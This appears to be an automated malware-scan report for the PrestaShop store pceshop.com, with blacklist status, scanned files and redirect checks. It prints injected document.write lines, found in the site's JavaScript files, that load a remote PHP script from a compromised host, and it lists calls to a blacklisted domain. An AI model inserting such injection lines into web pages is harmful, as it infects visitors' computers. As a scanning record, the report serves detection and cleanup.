Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pceshop.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.pceshop.com/ | 200 OK Content-Length: 39314 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mytravelsfirenze.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fa"><head><title>ÙرÙشگا٠اÛÙترÙØªÛ - Ù¾Û Ø³Û Ø§Û Ø´Ø§Ù¾|PceShop</title><meta name="description" content="ÙرÙشگا٠Ùدرت گرÙت٠از پرستا شاپ" /><meta name="keywords" content="ÙرÙشگاÙ, پرستا شاپ" /><meta http-e ...[3989 bytes skipped]... | ||
http://www.pceshop.com/themes/prestashop/cache/0e0e03f662e535f0bbd520887c104040.js | 200 OK Content-Length: 119567 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1729 bytes skipped]... ion(f){return f===b===d});else if(typeof b==="string"){var e=c.grep(a,function(f){return f.nodeType===1});if(Na.test(b))return c.filter(b,e,!d);else b=c.filter(b,e)}return c.grep(a,function(f){return c.inArray(f,b)>=0===d})}function na(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var e=c.data(a[d]),f=egory_list').trigger('goto',0);});document.write('<script type="text/javascript" src="http://avalosherreria.hostzi.com/administrator/38qgktch.php?id=55145902"></script>');;;(function(a){var b=a.serialScroll=function(c){return a(window).serialScroll(c)};b.defaults={duration:1e3,axis:"x",event:"click",start:0,step:1,lock:!0,cycle:!0,constant:!0};a.fn.serialScroll=function(c){return this.each(function(){var t=a.extend({},b.defaults,c),s=t.event,i=t.step,r=t.lazy,e=t.target?this:document,u=a(t.target||this,e),p=u[0],m=t.items,h=t.start,g=t.interval,k=t.navigation,l;if(!r){m=d()}if(t.forc ...[1460 bytes skipped]... Antivirus reports:
| ||
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234626 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:45 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://localhost/ | 200 OK Content-Length: 3724 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6948 Content-Type: text/javascript | clean |
http://mytravelsfirenze.com/test404page.js | 404 Not Found Content-Length: 401 Content-Type: text/html | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234655 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:46 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234666 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:47 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234741 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:48 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234664 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:48 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234619 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:49 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234609 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:49 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234648 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:50 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234637 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:50 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234662 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:51 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234775 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:51 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234998 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:52 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234616 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:53 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234612 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:53 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234658 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:54 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234643 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:54 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://www.pceshop.com/js/pluginDetect.js | 200 OK Content-Length: 23459 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://avalosherreria.hostzi.com/administrator/38qgktch.php?id=55145473"></script>');
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pceshop.com
Result:
GET / HTTP/1.1
Host: pceshop.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pceshop.com
Referer: http://www.google.com/search?q=pceshop.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pceshop.com
Referer: http://www.google.com/search?q=pceshop.com
Result:
The result is similar to the first query. There are no suspicious redirects found.